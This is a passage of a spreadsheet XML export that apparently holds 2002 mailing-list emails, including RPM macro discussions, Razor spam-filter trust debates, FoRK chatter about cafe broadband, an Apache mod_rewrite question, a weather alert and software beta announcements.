    <t>Hi. Dave Cridland  wrote: &gt; &gt; recommends *against* using '%configure' ("We will try to support users &gt; &gt; who accidentally type the leading % but this should not be relied &gt; &gt; upon."), and yet [snip] &gt; They're just suggesting people use "./configure" instead. No, they do not (what would be the use of that, anyway?). They say that they will _try_ to eval macros even if the user forgot to pass the leading '%', but that this feature should not be relied upon. --  On the first day of Christmas my true love sent to me        A badly configured newsreader _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 15 Aug 2002 19:36:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 19:36:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>Food bits</t>
  </si>
  <si>
    <t>OK, this site rocks...\n\n[URL]http://www.nal.usda.gov[/URL]\n\nYou are what you eat :)\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.nal.usda.gov http://www.mithral.com http://xent.com</t>
  </si>
  <si>
    <t>To: Luis Villa &lt;louie@ximian.com&gt;\nFrom: Jesse &lt;jesse@fsck.com&gt;\nDate: Thu, 15 Aug 2002 17:53:08 -0400</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 17:53:08 -0400</t>
  </si>
  <si>
    <t>Jesse &lt;jesse@fsck.com&gt;</t>
  </si>
  <si>
    <t>Re: It's a small world</t>
  </si>
  <si>
    <t>On Thu, Aug 15, 2002 at 05:46:55PM -0400, Luis Villa wrote:\n&gt; FWIW, slummerville actually has the internet- not just broadband, but\n&gt; actual broadband competition, which I gather is rare. I had ADSL and two\n&gt; cable options when I moved in.\n\n\nDid you actually attempt to order the DSL? Large chunks of somerville have\nadvertised DSL service that can't actually be obtained. Excuses vary, from\n"no available copper" to "full DSLAM", but the folks I know who've wanted\nDSL around here have all failed, ending up either with ATTBB, RCN or an\nhonest-to-god T1.\n\n        -j\n&gt; \n&gt; Luis\n&gt; \n\n-- \njesse reed vincent -- root@eruditorum.org -- jesse@fsck.com \n70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90\n\nThis is scary.  I'm imagining tracerouting you and seeing links like "Route\n84" and "Route 9, Exit 14".  Obviously, this is illness induced. \n								--Cana McCoy\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: cnice@nycap.rr.com\nFrom: weather@alerts.weather.com\nDate: Thu, 15 Aug 2002 17:46:07 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 17:46:07 -0400 (EDT)</t>
  </si>
  <si>
    <t>weather@alerts.weather.com</t>
  </si>
  <si>
    <t>cnice@nycap.rr.com</t>
  </si>
  <si>
    <t>SEVERE THUNDERSTORM WARNING UNTIL THU AUG 15 2002 05:45 PM EDT FOR 12144</t>
  </si>
  <si>
    <t>----------\n\nIf your day starts with a tee time, then visit our Golf Section. weather.com\n[URL]http://www.weather.com[/URL]\n\n----------\n\nSEVERE THUNDERSTORM WARNING NATIONAL WEATHER SERVICE ALBANY NY 518 PM EDT THU AUG 15 2002 \n\nTHE NATIONAL WEATHER SERVICE IN ALBANY HAS ISSUED A \n\n* SEVERE THUNDERSTORM WARNING FOR...   CENTRAL RENSSELAER COUNTY IN EASTERN NEW YORK \n\n* UNTIL 545 PM EDT \n\n* AT 514 PM EDT...NATIONAL WEATHER SERVICE DOPPLER RADAR INDICATED A   SEVERE THUNDERSTORM NEAR WYNANTSKILL...OR ABOUT 3 MILES EAST OF   TROY...MOVING EAST AT 15 MPH. \n\n* THE SEVERE THUNDERSTORM WILL BE NEAR...   AVERILL PARK AND RAYMERTOWN AT 525 PM EDT   GRAFTON AND BERLIN AT 545 PM EDT \n\nTHIS IS A DANGEROUS STORM. IF YOU ARE IN ITS PATH YOU SHOULD PREPARE FOR DAMAGING WINDS IN EXCESS OF 55 MPH...LARGE HAIL...AND VERY HEAVY RAIN. PEOPLE OUTSIDE SHOULD MOVE TO A SUBSTANTIAL SHELTER NOW.</t>
  </si>
  <si>
    <t>http://www.weather.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Gary Peck &lt;gbpeck@sbcglobal.net&gt;\nDate: Thu, 15 Aug 2002 17:45:31 -0700</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 17:45:31 -0700</t>
  </si>
  <si>
    <t>Well, thanks everyone for the explanations. I still disagree with the  reasoning, but it seems this is one of those philosophical questions  that I'm on the losing end of :) The checkinstall utility that someone mentioned seems useful, but I  don't really have the time to figure it out right now. After searching  the web some more, I found out that Mandrake's version of rpm is  patched to support what I wanted. So I guess I'll look into that when  I get a chance. On Thu, Aug 15, 2002 at 05:14:47PM +0200, Ralf Ertzinger wrote: &gt; Do nothing in the %build section, and copy the existing binaries &gt; in %install. As far as I can tell, this could be useful for my situation too. It's  not a complete solution since I can't really distribute the SRPMS with  full certainty that they work, but at least I can make RPMS for local  use by tarring up the buildroot directory and then using the above  technique. All I really want is to get dependency tracking for  everything installed on my system (including software from cvs). This  just makes it a little bit faster. gary _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Luis Villa &lt;louie@ximian.com&gt;\nFrom: Jesse &lt;jesse@fsck.com&gt;\nDate: Thu, 15 Aug 2002 17:35:04 -0400</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 17:35:04 -0400</t>
  </si>
  <si>
    <t>Short version:\nT-Mobile Broadband is in the process of wiring every starbucks in the area\n(T1 backhauled to some ~local POP + 802.11) as part of what I'm told is a\nnational rollout. The Diesel is close enough to the Elm St starbucks for me\nto get reasonable net throughout most of the cafe. \n\nThe rumor is that they'll be announcing that they've got boston covered on\nthe 21st.  I've heard from at least one source that they're actually going\nto announce a much wider national rollout at that time.  It's not cheap [1], but\nfor soemone like me who's running a ~virtual corporation, it's well worth it.\n\n[1] [URL]https://accounts.tmobilebroadband.com[/URL]\n\n\n\nOn Thu, Aug 15, 2002 at 04:51:07PM -0400, Luis Villa wrote:\n&gt; On Thu, 2002-08-15 at 16:38, Jesse wrote:\n&gt; &gt; Strata just walked up to me in a cafe in Somerville, MA and\n&gt; &gt; asked me how I was getting net here. And _then_ we figured out \n&gt; &gt; that we have shared context.\n&gt; \n&gt; The obvious followup is 'there's a cafe in somerville with net access?'\n&gt; Luis [19 Pitman St.]\n&gt; [URL]http://xent.com[/URL]\n&gt; \n\n-- \njesse reed vincent -- root@eruditorum.org -- jesse@fsck.com \n70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90\n\nautoconf is your friend until it mysteriously stops working, at which \npoint it is a snarling wolverine attached to your genitals by its teeth\n (that said, it's better than most of the alternatives)  -- Nathan Mehl\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>https://accounts.tmobilebroadband.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: webdev@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 15 Aug 2002 17:15:53 +0100</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 17:15:53 +0100</t>
  </si>
  <si>
    <t>[Webdev] mod_rewrite question</t>
  </si>
  <si>
    <t>I'm trying to wrap Zope up behind apache, so I can do VirtualHosts for Zope.  I've a site on http://ip:8080/mysite.  I want that to appear as [URL]http://mysite.com[/URL] - so:         ServerName mysite.com         DocumentRoot /var/www/mysite         RewriteEngine                   on         RewriteRule     ^/(.*)    http://localhost:8080/mysite/$1 [P]  Now, what happens is that apache grabs http://localhost:8080/mysite/ and spits it out to the browser. Lovely. all works.  Except for framed pages (like Zope's management interface). It ends up looking like:       and of course, that's not what my client should go to. Any ideas what I'm doing wrong ? Kate _______________________________________________ Webdev mailing list Webdev@linux.ie [URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>http://mysite.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Jesse &lt;jesse@fsck.com&gt;\nDate: Thu, 15 Aug 2002 16:38:06 -0400</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 16:38:06 -0400</t>
  </si>
  <si>
    <t>It's a small world</t>
  </si>
  <si>
    <t>Strata just walked up to me in a cafe in Somerville, MA and\nasked me how I was getting net here. And _then_ we figured out \nthat we have shared context.\n\n        Jesse\n-- \njesse reed vincent -- root@eruditorum.org -- jesse@fsck.com \n70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90\n\nI have images of Marc in well worn combat fatigues, covered in mud, \nsweat and blood, knife in one hand and PSION int he other, being \nrestrained by several other people, screaming "Let me at it! \nJust let me at it!"  Eichin standing calmly by with something \nautomated, milspec, and likely recoilless.\n				-monty on opensource peer review\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "Harig, Mark A." &lt;maharig@idirect.net&gt;\nDate: Thu, 15 Aug 2002 15:30:40 -0400</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 15:30:40 -0400</t>
  </si>
  <si>
    <t>RE: Documentation about built-in RPM macros?</t>
  </si>
  <si>
    <t>&gt; -----Original Message----- &gt; From: Ralf Ertzinger [mailto:ralf@camperquake.de] &gt; Sent: Thursday, August 15, 2002 2:53 PM &gt; To: rpm-zzzlist@freshrpms.net &gt; Subject: Re: Documentation about built-in RPM macros? &gt;  &gt;  &gt; Hi. &gt;  &gt; Dave Cridland  wrote: &gt;  &gt; &gt; &gt; recommends *against* using '%configure' ("We will try to  &gt; support users &gt; &gt; &gt; who accidentally type the leading % but this should not be relied &gt; &gt; &gt; upon."), and yet &gt;  &gt; [snip] &gt;  &gt; &gt; They're just suggesting people use "./configure" instead. &gt;  &gt; No, they do not (what would be the use of that, anyway?).  &gt; They say that &gt; they will _try_ to eval macros even if the user forgot to pass the &gt; leading '%', but that this feature should not be relied upon. &gt;  Hmm.  1. The quote is not suggesting that people use './configure'. 2. The quote is not saying that rpm will _try_ to eval macros even if the user forgot to pass the leading '%'.  It is saying the opposite: rpm will try to support users who "forgot" to _leave off_ the leading '%'.  That is what the documentation _says_, but rpm does not follow the documentation.  If you leave off the '%', then rpm will not eval the macro, at least for rpm 4.0.4. Confused? Anyway, back to my original problem: what about documentation for the macros '%post', '%postun', and '%files'?  Here's some of what I found "documented" in the the CHANGES file that 'rpm' includes: Line 46: 	- macro for %files, always include %defattr(), redhat config only. Line 49: 	- bail on %files macro. Hmm.  So, there is no %files macro? Line 172-174: 	- add "rpmlib(ScriptletInterpreterArgs)" to track 	    %post -p "/sbin/ldconfig -n /usr/lib" 	  incompatibilities. I'm unable to find a corresponding description for %postun, but it appears to work just the same.  The important things to remember are:   1. Don't forget the double-quotes around the -p argument string.  If      you leave them off, you'll get the cryptic error message:      error: line #: Package does not exist: %post -p /sbin/ldconfig -n /usr/lib   2. This only works with RPM 4.0.3 or later. &gt; --  &gt; On the first day of Christmas my true love sent to me &gt;        A badly configured newsreader &gt;  &gt; _______________________________________________ &gt; RPM-List mailing list  &gt; [URL]http://lists.freshrpms.net[/URL] &gt;  _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: zzz@example.com\nFrom: iSilo &lt;list@iSilo.com&gt;\nDate: Thu, 15 Aug 2002 14:22:26 -0500</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 14:22:26 -0500</t>
  </si>
  <si>
    <t>iSilo &lt;list@iSilo.com&gt;</t>
  </si>
  <si>
    <t>zzz@example.com</t>
  </si>
  <si>
    <t>iSilo announcements (August 15, 2002)</t>
  </si>
  <si>
    <t>---------------------------------------------------------------------- 1. iSilo(TM) 3.2 for Palm OS and Pocket PC enters beta1 2. iSilo(TM) 3.2 for Windows enters beta1 3. iSiloX 3.2 for Windows and Mac OS enters beta1 4. iSiloXC 3.2 for Windows, Linux, FreeBSD, Mac OS X,    and Solaris enter beta1 ---------------------------------------------------------------------- ====================================================================== 1. iSilo(TM) 3.2 for Palm OS and Pocket PC enters beta1 ---------------------------------------------------------------------- iSilo(TM) 3.2b1 adds the following new features to iSilo 3.15: - A System Information dialog, accessible from either the document   list view or while viewing a document through the Tools menu.   The dialog displays the user name (e.g., owner name) and the   associated user ID of the device.  For Palm OS, the dialog also   displays the free and total amount of dynamic and storage memory. - Support for iSiloX/iSiloXC generated password protected documents.   The password protection is embedded into the document during   conversion and can not be modified nor removed from the converted   document. - Support for iSiloX/iSiloXC generated registration code protected   documents. The registration code protection is embedded into the   document during conversion. - Support for iSiloX/iSiloXC generated documents that include an   expiration date. The expiration date is embedded into the document   during conversion. - Support for displaying Title, Author, and Publisher information   messages through the Document Information dialog accessible through   the Edit menu while viewing a document. Please note that this is a beta version of the software, and as such is intended for testing purposes to help eliminate problems and issues before the release. Please report any problems or issues you encounter by sending an email to email@iSilo.com.  When reporting problems, please include all potentially relevant details, including the exact steps used to reproduce the problem, OS version, and hardware configuration. To download iSilo(TM) 3.2b1 for Palm OS(R), please go to this URL:      To download iSilo 3.2b1 for Pocket PC, please go to this URL:      ====================================================================== 2. iSilo(TM) 3.2 for Windows enters beta1 ---------------------------------------------------------------------- iSilo(TM) 3.2 will be the first version of iSilo for Windows and has the requirements shown here. Basic requirements: - Pentium or comparable processor - Windows 95 with Internet Explorer 4.0.1 or later, Windows 98,   Windows Millennium, Windows NT 4.0 with Service Pack 6,   Windows 2000, or Windows XP - 16MB of RAM for Windowsr 95 and Windows 98 (32MB recommended),   32MB of RAM for Windows Millennium and Windows NT 4.0,   64MB of RAM for Windows 2000 and Windows XP - 5MB of available hard-disk space for installation Additional functionality specific requirements: - Additional memory required for document storage. - iSiloX required for creating documents utilizing maximum document   presentation capabilities. Please note that this is a beta version of the software, and as such is intended for testing purposes to help eliminate problems and issues before the release. Please report any problems or issues you encounter by sending an email to email@iSilo.com.  When reporting problems, please include all potentially relevant details, including the exact steps used to reproduce the problem, OS version, and hardware configuration. To download iSilo 3.2b1 for Windows, please go to this URL:      ====================================================================== 3. iSiloX 3.2 for Windows and Mac OS enters beta1 ---------------------------------------------------------------------- iSiloX 3.2b1 adds the following features to iSiloX 3.15: - In the Security properties, added support for protecting a document   with any or all of a password, registrationn code, and expiration   date. - Added a Messages property page for specifying title, author,   publisher, password, registration code, and expiration date   messages for the document. - Added cookie support and a Cookies property page for managing   cookies. Please note that this is a beta version of the software, and as such is intended for testing purposes to help eliminate problems and issues before the release. Please report any problems or issues you encounter by sending an email to email@iSilo.com.  When reporting problems, please include all potentially relevant details, including the exact steps used to reproduce the problem, OS version, and hardware configuration. To download iSiloX 3.2b1 for Windows, please go to this URL:      To download iSiloX 3.2b1 for Mac OS, please go to this URL:      ====================================================================== 4. iSiloXC 3.2 for Windows, Linux, FreeBSD, Mac OS X,    and Solaris enter beta1 ---------------------------------------------------------------------- iSiloX 3.2b1 adds the following features to iSiloX 3.15: - Added , , and  container   elements under the  element for protecting a   document with any or all of a password, registration code, and   expiration date. See .ixl file format for more information. - Added  element for specifying title, author, publisher,   password, registration code, and expiration date messages for the   document. See .ixl file format for more information. - Added cookie support and the  element for managing   cookies. See .ixl file format for more information. Please note that this is a beta version of the software, and as such is intended for testing purposes to help eliminate problems and issues before the release. Please report any problems or issues you encounter by sending an email to email@iSilo.com.  When reporting problems, please include all potentially relevant details, including the exact steps used to reproduce the problem, OS version, and hardware configuration. To download iSiloXC 3.2b1 for Windows, please go to this URL:      To download iSiloXC 3.2b1 for Linux, please go to this URL:      To download iSiloXC 3.2b1 for FreeBSD, please go to this URL:      To download iSiloXC 3.2b1 for Mac OS X, please go to this URL:      To download iSiloXC 3.2b1 for Solaris, please go to this URL:      ---------------------------------------------------------------------- You have received this message because you subscribed to the iSilo(TM) mailing list.  If you would like to be removed from this list, please send an email with the subject "unsubscribe" to: . Please note that this email address only handles subscriptions and unsubscriptions of the mailing list.  Any other messages sent to this email address are automatically deleted. ---------------------------------------------------------------------- iSilo(TM)             [URL]http://www.iSilo.com[/URL]             email@iSilo.com</t>
  </si>
  <si>
    <t>http://www.iSilo.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Thu, 15 Aug 2002 14:09:26 -0700</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 14:09:26 -0700</t>
  </si>
  <si>
    <t>RE: It's a small world</t>
  </si>
  <si>
    <t>There was internet in Arleigh Beach Australia (see one end of town from\nthe other) 6 years ago.\n\nThat is when I figured the Internet was truly global ...\n\n\n\n&gt; -----Original Message-----\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nElias\n&gt; Sinderson\n&gt; Sent: Thursday, August 15, 2002 2:01 PM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: Re: It's a small world\n&gt; \n&gt; Or even "When did Somerville get the internet?"  ;-)\n&gt; \n&gt; E\n&gt; \n&gt; Luis Villa wrote:\n&gt; \n&gt; &gt;On Thu, 2002-08-15 at 16:38, Jesse wrote:\n&gt; &gt;\n&gt; &gt;&gt;Strata just walked up to me in a cafe in Somerville, MA and\n&gt; &gt;&gt;asked me how I was getting net here. And _then_ we figured out\n&gt; &gt;&gt;that we have shared context.\n&gt; &gt;&gt;\n&gt; &gt;\n&gt; &gt;The obvious followup is 'there's a cafe in somerville with net\naccess?'\n&gt; &gt;Luis [19 Pitman St.]\n&gt; &gt;[URL]http://xent.com[/URL]\n&gt; &gt;\n&gt; \n&gt; \n&gt; [URL]http://xent.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Elias Sinderson &lt;elias@cse.ucsc.edu&gt;\nDate: Thu, 15 Aug 2002 14:00:51 -0700</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 14:00:51 -0700</t>
  </si>
  <si>
    <t>Or even "When did Somerville get the internet?"  ;-)\n\nE\n\nLuis Villa wrote:\n\n&gt;On Thu, 2002-08-15 at 16:38, Jesse wrote:\n&gt;\n&gt;&gt;Strata just walked up to me in a cafe in Somerville, MA and\n&gt;&gt;asked me how I was getting net here. And _then_ we figured out \n&gt;&gt;that we have shared context.\n&gt;&gt;\n&gt;\n&gt;The obvious followup is 'there's a cafe in somerville with net access?'\n&gt;Luis [19 Pitman St.]\n&gt;[URL]http://xent.com[/URL]\n&gt;\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Chip Paswater &lt;turk182@chipware.net&gt;\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Thu, 15 Aug 2002 11:51:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 11:51:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Wed, 14 Aug 2002, Chip Paswater wrote:\n\n&gt; &gt; &gt; &gt; It's not my desire to second-guess you Vipul (however much my missives\n&gt; &gt; &gt; &gt; may appear otherwise) or question the hard work you and the other\n&gt; &gt; &gt; &gt; developers have put into the system, however it seems that every request\n&gt; &gt; &gt; &gt; for such information has been met with silence.\n&gt; &gt; &gt;\n&gt; &gt; &gt; There are no plans for releasing details about TeS. Before the\n&gt; &gt; &gt; release of Razor2, I'd pointed out that Razor2 backend (specially\n&gt; &gt; &gt; TeS) will be closed.\n&gt; &gt;\n&gt; &gt; Thanks for the clarification. Guess it's time to find something that is\n&gt; &gt; open.\n&gt; &gt;\n&gt; &gt; Good luck.\n&gt;\n&gt; Why do the details of the backend need to be open?\n&gt;\n&gt; I don't think that Ebay publishes it's proprietary trust backend, why\n&gt; should Razor?\n\n[last message before I unsub]\n\nIt's a very poor comparison.\n\nThere is no question as to what Ebay's trust model is. It's\ncompletely transparent. The ratings and the feedback is there for all to\nsee. Most importantly it relies on the individual to make the decision for\nthemselves rather or not to trust a buyer/seller.\n\nContrast this with TeS which utilizes "sooper secret" methodologies to\ndetermine rather or not a submitter is trusted or not and at what point\nsomething becomes spam at some level of "confidence."\n\nThe unfortunate thing is that in my experience Razor is an incredibly\nineffective filter at this point. The spot checking I've done indicates about\na 40% hit rate. Submissions I made a week ago still don't count as spam,\napparently because I'm not trusted enough, or enough people haven't submitted\nthe item, or some unknown combination thereof. Why anyone would continue to\nwaste their time submitting items when they aren't being accepted due to\na series of calculations which will not be shared is beyond me.\n\nAny trust model that cannot survive public scrutiny isn't worth trusting IMHO.\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nDate: Thu, 15 Aug 2002 11:43:33 -0700</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 11:43:33 -0700</t>
  </si>
  <si>
    <t>--J2SCkAp4GZ/dPZZf\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\n\n\nOn Thu, Aug 15, 2002 at 10:37:37AM -0700, Brian May wrote:\n\n# Isn't eBays trust the feedback?\n\nSure, but one can surmise that the "Star Rating" or feedback isn't an\nexact correlation to their internal metrics.\n\n\n--jordan\n\n--J2SCkAp4GZ/dPZZf\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9W/ZUpwQdAVEbU7oRAoa3AKCobztB2JiVbwsXV50ydjdLgEtiSwCgtG+f\nYvz2asms9q5vpwEZJZxR7bk=\n=DJsq\n-----END PGP SIGNATURE-----\n\n--J2SCkAp4GZ/dPZZf--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Antoun Nabhan &lt;anabhan@attglobal.net&gt;\nDate: Thu, 15 Aug 2002 10:50:13 -0700</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 10:50:13 -0700</t>
  </si>
  <si>
    <t>Antoun Nabhan &lt;anabhan@attglobal.net&gt;</t>
  </si>
  <si>
    <t>So what's a species again?</t>
  </si>
  <si>
    <t>--=====================_4805122==_.ALT Content-Type: text/plain; charset="us-ascii"; format=flowed Well, all the transhumanists should be very interested in this one: &gt;Cross-species testes transplant successful &gt;19:00 14 August 02 NewScientist.com news service &gt;Testis tissue from goats and pigs has been grafted onto the backs of mice  &gt;and shown to produce normal sperm, capable of fertilising eggs. &gt;It is the first time testis tissue from such distant species has produced  &gt;mature sperm when grafted in mice. "It might work for primates or even  &gt;humans," claims Ina Dobrinski of the University of Pennsylvania, one of  &gt;the co-authors of the study. &gt;If so, the technique could be used to preserve the reproductive potential  &gt;of male cancer patients about to undergo therapies that would destroy  &gt;their ability to make sperm. &gt;Men often freeze sperm samples before receiving chemotherapy, but young  &gt;boys cannot do this because they do not produce mature sperm. If it works  &gt;in humans, the technique would allow testis tissue grafted from boys to  &gt;mature and produce sperm. &gt; &gt;Infectious particles &gt;The mouse grafting technique also has an advantage over another option for  &gt;preserving fertility - testicular transplants. These involve re-implanting  &gt;preserved germ cells into the testes after cancer remission. &gt;But the grafting approach "would eliminate any possibility of passing  &gt;cancer cells back to the patient," says reproductive biologist Michael  &gt;Griswold from Washington State University. &gt;However, it is possible that the grafting procedure could introduce  &gt;mouse-derived infectious particles into human embryos, making some  &gt;scientists wary of the idea. "I would very much hesitate to say that it's  &gt;something we should be doing," says reproductive biologist Roger Gosden of  &gt;the East Virginia Medical School. &gt; &gt;Castrated mice &gt;In the study, Dobrinski and colleagues placed small pieces of testis  &gt;tissue from newborn goats or pigs just under the skin on the backs of  &gt;castrated mice. Two to four weeks later, they found that more than half of  &gt;the 477 grafts had survived and were producing normal-looking goat or pig  &gt;sperm. &gt;When they injected the graft-derived sperm directly into eggs they saw  &gt;clear signs of fertilisation, indicating that the sperm function normally.  &gt;The researchers also found that the procedure worked just as well with  &gt;testis tissue that had been refrigerated for two days or frozen for  &gt;several weeks. &gt;Gosden has tried transplanting human testes tissue into mice, but was not  &gt;successful. However, Dobrinski believes the technique could soon be used  &gt;to preserve the germ lines of endangered species, including rare animals  &gt;that usually die in captivity before reaching sexual maturity. "We think  &gt;that's a very real application," she says. &gt;She adds that mice with human testis tissue grafts would also be useful to  &gt;scientists who want to test the effects of toxic substances and new  &gt;contraceptives on human sperm production. &gt;Journal reference: Nature (vol 418, p 778) &gt;Robin Orwant --=====================_4805122==_.ALT Content-Type: text/html; charset="us-ascii" Well, all the transhumanists should be very interested in this one: &lt;[URL]http://www.newscientist.com[/URL]&gt; Cross-species testes transplant successful  19:00 14 August 02 NewScientist.com news service  Testis tissue from goats and pigs has been grafted onto the backs of mice and shown to produce normal sperm, capable of fertilising eggs.  It is the first time testis tissue from such distant species has produced mature sperm when grafted in mice. "It might work for primates or even humans," claims Ina Dobrinski of the University of Pennsylvania, one of the co-authors of the study.  If so, the technique could be used to preserve the reproductive potential of male cancer patients about to undergo therapies that would destroy their ability to make sperm. Men often freeze sperm samples before receiving chemotherapy, but young boys cannot do this because they do not produce mature sperm. If it works in humans, the technique would allow testis tissue grafted from boys to mature and produce sperm. Infectious particles  The mouse grafting technique also has an advantage over another option for preserving fertility - testicular transplants. These involve re-implanting preserved germ cells into the testes after cancer remission.  But the grafting approach "would eliminate any possibility of passing cancer cells back to the patient," says reproductive biologist Michael Griswold from Washington State University. However, it is possible that the grafting procedure could introduce mouse-derived infectious particles into human embryos, making some scientists wary of the idea. "I would very much hesitate to say that it's something we should be doing," says reproductive biologist Roger Gosden of the East Virginia Medical School. Castrated mice  In the study, Dobrinski and colleagues placed small pieces of testis tissue from newborn goats or pigs just under the skin on the backs of castrated mice. Two to four weeks later, they found that more than half of the 477 grafts had survived and were producing normal-looking goat or pig sperm. When they injected the graft-derived sperm directly into eggs they saw clear signs of fertilisation, indicating that the sperm function normally. The researchers also found that the procedure worked just as well with testis tissue that had been refrigerated for two days or frozen for several weeks. Gosden has tried transplanting human testes tissue into mice, but was not successful. However, Dobrinski believes the technique could soon be used to preserve the germ lines of endangered species, including rare animals that usually die in captivity before reaching sexual maturity. "We think that's a very real application," she says. She adds that mice with human testis tissue grafts would also be useful to scientists who want to test the effects of toxic substances and new contraceptives on human sperm production.  Journal reference: Nature (vol 418, p 778)  Robin Orwant --=====================_4805122==_.ALT-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.newscientist.com http://xent.com</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Brian May" &lt;brian@unearthed.com&gt;\nDate: Thu, 15 Aug 2002 10:37:37 -0700</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 10:37:37 -0700</t>
  </si>
  <si>
    <t>Isn't eBays trust the feedback? ----- Original Message ----- From: "Chip Paswater"  To: "Patrick"  Cc:  Sent: Wednesday, August 14, 2002 9:51 PM Subject: Re: [Razor-users] Re: What's wrong with the Razor servers now? &gt; &gt; &gt; It's not my desire to second-guess you Vipul (however much my missives &gt; &gt; &gt; may appear otherwise) or question the hard work you and the other &gt; &gt; &gt; developers have put into the system, however it seems that every request &gt; &gt; &gt; for such information has been met with silence. &gt; &gt; &gt; &gt; There are no plans for releasing details about TeS. Before the &gt; &gt; release of Razor2, I'd pointed out that Razor2 backend (specially &gt; &gt; TeS) will be closed. &gt; &gt; Thanks for the clarification. Guess it's time to find something that is &gt; open. &gt; &gt; Good luck. Why do the details of the backend need to be open? I don't think that Ebay publishes it's proprietary trust backend, why should Razor? ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 15 Aug 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-08-15</t>
  </si>
  <si>
